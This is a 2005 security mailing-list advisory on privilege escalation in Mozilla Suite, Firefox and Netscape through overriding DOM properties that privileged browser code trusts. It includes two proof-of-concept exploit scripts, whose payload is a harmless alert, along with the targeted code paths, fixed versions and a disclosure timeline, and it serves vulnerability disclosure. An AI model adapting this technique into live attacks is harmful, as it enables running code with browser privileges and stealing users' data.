From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 1 May 2005 17:40:28 +0200
Subject: [NEWS] Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite, Firefox and Netscape
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050501154557.2D96E57F7@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Privilege Escalation Via DOM Property Overrides in Mozilla Suite,
Firefox and Netscape
------------------------------------------------------------------------
SUMMARY
Multiple Privilege Escalation in DOM where found in Mozilla based we
browsers (Mozilla suite, Netscape and Firefox) that give attackers the
ability to install malicious code or steal data, requiring only that the
user do commonplace actions like click on a link or open the context menu.
DETAILS
Vulnerable Systems:
* Firefox version 1.0.2 and prior
* Mozilla Suite version 1.7.6 and prior
* Netscape version 7.2
Immune Systems:
* Firefox version 1.0.3
* Mozilla Suite version 1.7.7
By using eval() and other Javascript functions, it is possible to override
properties and methods of DOM nodes and shadow the native values, unless
steps are taken to get the true underlying values. The common cause in
each case was privileged UI code ("chrome") being overly trusting of DOM
nodes from the content window. Scripts in the web page can override
properties and methods of DOM nodes and shadow the native values, unless
steps are taken to get the true underlying values.
Exploit 1:
< body style="width:100%;height:100%;">
Click on document.
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'body';";
document.body.__defineGetter__("localName", function() {
var s = new String('BODY');
s.toLowerCase = new Script(code);
return s;
});
</script>
</body>
Exploit 2:
< script>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);'';";
document.createElement("link").__proto__
__defineGetter__("rel", new Script(code));
</script>
<link rel="test"/>
< pre>
Target of attack
Firefox 1.0.2
livemarkOnLinkAdded() in browser.js
< i>var erel = event.target.rel;</i>
If pref "browser.chrome.site_icons" is true:
Firefox 1.0.2
onLinkAdded() in tabbrowser.xml
< i>if (!event.target.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
return;</i>
Mozilla 1.7.6
onLinkAdded() in tabbrowser.xml
< i>if (!event.originalTarget.rel.match((/(?:^|\s)icon(?:\s|$)/i)))
return;</i>
</pre>
Workaround:
Update to the latest Firefox/Mozilla suite web browser or disable
Javascript support.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1160>;
Disclosure Timeline:
23-04-2005 - Vulnerability discovered
28-04-2005 - Detailed research
28-04-2005 - Vendor informed
28-04-2005 - Security companies informed
29-04-2005 - More security companies and CERT-FI informed
29-04-2005 - Advisory published
ADDITIONAL INFORMATION
The information has been provided by <mailto:juha-matti.laurio@netti.fi.>
Juha-Matti Laurio .
The original article can be found at:
<http://www.networksecurity.fi/advisories/netscape-dom.txt>;
http://www.networksecurity.fi/advisories/netscape-dom.txt
For more information about the bug please visit the following site:
<http://www.mozilla.org/security/announce/mfsa2005-41.html>;
http://www.mozilla.org/security/announce/mfsa2005-41.html
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
